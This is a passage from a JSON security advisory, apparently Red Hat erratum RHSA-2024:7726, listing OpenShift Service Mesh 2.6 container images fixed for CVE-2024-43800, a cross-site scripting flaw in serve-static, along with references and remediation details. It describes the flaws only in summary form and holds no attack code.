"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
